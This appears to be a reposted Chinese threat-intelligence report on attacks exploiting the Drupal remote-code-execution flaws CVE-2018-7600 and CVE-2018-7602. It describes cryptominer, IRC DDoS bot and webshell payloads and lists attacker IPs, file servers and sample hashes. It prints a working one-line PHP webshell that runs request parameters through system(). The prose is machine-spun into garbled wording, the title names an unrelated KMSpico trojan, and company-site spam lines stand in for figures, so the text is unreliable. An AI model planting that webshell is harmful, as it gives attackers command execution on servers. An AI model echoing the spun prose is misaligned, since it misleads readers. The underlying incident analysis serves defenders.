KMSpico激活工具木马剖析

2017-09-30

宣布者：AG公司科技

Drupal远程代码执行误差威胁态势剖析

一、概述

Drupal官方在2018年3月28日宣布sa-core-2018-002 (CVE-2018-7600) Drupal内核远程代码执行误差预警，之后一个月内又一连宣布两个误差，其中包括一个XSS和另一个高危代码执行误差sa-core-2018-004 (CVE-2018-7602)，以后两个月内互联网上针对Drupal程序的攻击很是频仍，AG公司科技威胁情报中心（NTI）团结清静情报数据，从误差披露到使用程序的撒播，总结了外界针对Drupal程序的常见攻击手法，对相关态势举行了梳理，希望可以为清静从业职员提供建媾和参考。

二、误差披露时间轴

AG公司(中国集团)·有限公司官网

虽然误差已经披露，相关使用的PoC却在两周后才放出，而仅仅在PoC披露后几个小时，就发明有使用此误差的攻击泛起。在随后的时间内互联网上针对Drupal程序的攻击迅速增添，在4月29日抵达峰值，并且针对该误差的攻击还在一连。

AG公司(中国集团)·有限公司官网

在PoC宣布的时间轴上，扫描攻击中7.x版本的误差触发uri泛起频率逐渐多于8.x版本，能看出攻击者的注重力逐渐从8.x版本转移到7.x版本。

AG公司(中国集团)·有限公司官网

下图统计了已往两个月间攻击ip在全球的漫衍情形，主要集中在北美洲、欧洲以及南美洲等区域，在国家层面上则是以墨西哥、厄瓜多尔、俄罗斯和美国为主要攻击源。

AG公司(中国集团)·有限公司官网

我们关注了提倡攻击最频仍的几个ip，发明其中部分ip同时加入多种类型误差攻击，好比Weblogic反序列化误差(CVE-2017-10271)， Struts2-s2045误差(CVE-2017-5638)等，除此之外也有相当数目的ip会对内网举行横向扩展实现蠕虫式撒播，我们判断此类ip属于僵尸网络的一部分。

三、攻击与使用

凭证我们的监控，误差宣布后不久，网络中迅速泛起了三类差别形式的攻击方法：

挖矿使用。攻击者使用误差在主机中植入数字钱币的挖矿程序，使用主机资源举行挖矿运算。挖矿程序主要针对门罗币，并且同时保存Windows和Linux两个版本；
远控使用。该使用具有下令执行、下载远程文件、tcp/udp flood攻击等功效；
Webshell植入。我们捕获的Webshell包括一句话木马，小马和功效强盛的大马；

在这三类攻击方法中，挖矿使用的手法较量常见，而相关攻击指令和矿池地点也在其他RCE误差中泛起过，可以判断黑产团伙也在亲近关注此类高危误差。我们统计了这三类在所有攻击中的占比，其中向受害者主机植入挖矿剧本的占到95%，植入远控类样本占3%，植入网站后门的占1%，尚有少部分部分是在目的网站挂上黑页。

AG公司(中国集团)·有限公司官网

挖矿类

在远程代码执行误差被披露后，黑产组织向误差主机植入挖矿程序，使用系统资源举行挖矿牟利，这类攻击往往走在最前面，并且黑产组织通�；嵬狈⑺突贚inux系统和Windows系统的攻击载荷，对差别平台抵达相同的攻击目的。

Windows平台

在Windows下攻击者会通过powershell写入vbs剧本并挪用wscript下载恶意程序，或者直接通过powershell下载，样本运行后会释放出设置文件，并修改注册表实现自我�；�

AG公司(中国集团)·有限公司官网

这条下令是从188.166.148.89下载5_DRUPAL并通过powershell执行

AG公司(中国集团)·有限公司官网

2.Linux平台

在linux平台下的攻击载荷则是多种多样，例如混淆编码，伪装成jpg或者pdf文件等，攻击者会适配x86平台或x64平台，在受害者主机下载响应的挖矿程序，同时写入妄想使命坚持长期性，最终目的使用系统资源获取数字钱币。

例如

AG公司(中国集团)·有限公司官网 wget下载shell剧本

AG公司(中国集团)·有限公司官网

payload经由八进制编码

这些样本的行为都是获取门罗币，而在整个误差使用历程中，门罗币组织判断有些钱包地点与僵尸网络有关，封停了部分钱包地点。

AG公司(中国集团)·有限公司官网

这时代我们发明了首例使用CVE-2018-7600误差蠕虫式撒播的僵尸网络Muhstik，并且捕获了多个活跃样本，AG公司威胁情报中心（NTI）剖析出该家族样本和C&C之间的关系。

AG公司(中国集团)·有限公司官网

NTI展示Muhstik家族关系

远控类

在误差爆发时代，我们监测到使用该误差撒播的基于IRC协议的DDoS攻击远控剧本，剧本使用perl语言编写，注释中泛起了葡萄牙语和西班牙语，我们剖析了剧本的功效模块，发明一台C&C主机104.160.176.178，该剧本会凭证指令举行下令执行、下载远程文件、tcp/udp flood等攻击

AG公司(中国集团)·有限公司官网

一些指令集

Webshell类

除了在受害者主机植入挖矿程序和远控程序外，远程下载webshell植入网站的也不在少数，而攻击事务批注越来越多的攻击者喜欢使用在线文件/文天职享平台存放webshell或bash剧本，隐藏真正的主机，抵达隐匿踪迹的目的。

我们捕获了几类webshell如下，包括一句话木马，小马和功效强盛的大马。

一句话木马：

if(isset($_REQUEST['c'])) {system( $_REQUEST['c'].'2>&1');}

我们统计两周内发送该一句话木马的攻击ip及泛起次数如下：

IP	泛起次数
51.15.135.96	29
58.215.144.205	23
207.148.125.97	21
82.102.20.177	15
59.124.153.166	12
185.244.25.138	8
89.163.190.57	5
82.102.20.230	4
46.243.189.110	4
185.232.65.221	4
138.197.175.247	4
207.246.71.229	3
93.158.215.168	2
82.102.20.171	2
46.243.189.109	2

webshell/小马

AG公司(中国集团)·有限公司官网

webshell/大马

AG公司(中国集团)·有限公司官网

四、总结与建议

对此次Drupal内核远程代码执行误差事务的跟踪视察中，我们发明

从误差使用细节宣布到有用攻击泛起，时间窗口很是短暂，留给防御者的时间极其有限。此次事务中，这个时间窗口甚至已经缩短到小时级；
黑客普遍追求攻陷主机的数目。黑客在误差宣布后短时间内，迅速开发相关使用工具，通过自动化的扫描与使用，在互联网上普遍地搜集缺陷主机，保存误差的网站普遍都保存着被攻陷的危害。因此治理员需要对网站泛起的误差有足够的重视，第一时间举行升级和修补；
黑客具有较强的反追踪能力。黑客使用在线文件分享平台来隐匿自己的踪迹，例如pastebin等；

防护建议：

网站治理员应一连关注网站程序相关的误差情报，实时更新网站程序，升级防护装备规则；
治理员要关注网站主机系统资源使用情形，短时间内资源使用骤增且居高不下，需要关注是否被挖矿程序入侵，实时做好备份和整理恶意软件；

五、相关IOC

网络通讯

142.44.240.14

145.239.93.215

188.166.148.89:444

217.182.231.56:443

195.22.127.225

104.160.176.178

文件服务器

http://94.41.167.11/

http://195.22.126.16/

http://188.166.148.89:53/

http://192.241.247.212/

http://93.174.93.149/

http://198.50.179.109:8020/

样本哈希

样本	备注	sha1
xm32.exe	门罗币挖矿	cb00248b8bcd91e68c08a061a91cc3317db5724b
Xm64.exe	门罗币挖矿	8360f0d2df9008240f1d5e0f8acdbd2c98bad58c
Xm32s	门罗币挖矿	fcdd9c19b6b134dc31b3b688002eb51cac76a3ff
xm64s	门罗币挖矿	8822037953274ddd9f78b49ee73185be20e5e3ef
1234567890.pdf	门罗币挖矿	94c2ea3cf1cdb034df2e9aa5779fa0472396bff7
2sm.txt	远控剧本	d7eb30269b3ba40ef59c0acef8948898fa54895f
maxx2.txt	远控剧本	68efd61193fc9b70394abb2327de2bf6b1f368b7
test.pl	远控剧本	046a9c9838269fc5f76890b141bb39d22e6b9456
wow.txt	远控剧本	c84dc265859d58827369eb25b752b6305b8306e7
K.txt	php webshell	7602c5cbc63e1bf2e484db63c94d5a22b7e17304
wso-encode.php	php webshell	e9e09b90cfdc1cd2ddb867385afa60816a7ee7d5
bash	Muhstik家族	f92f1b03bcc45b692716789387d837905c8d4d76
shy	Muhstik家族	0f4a3e0c6523fe0a0677f91182a1eabc536ff480
fbsd	Muhstik家族	e6f914790b3888a46dff60f51a98c7191208685a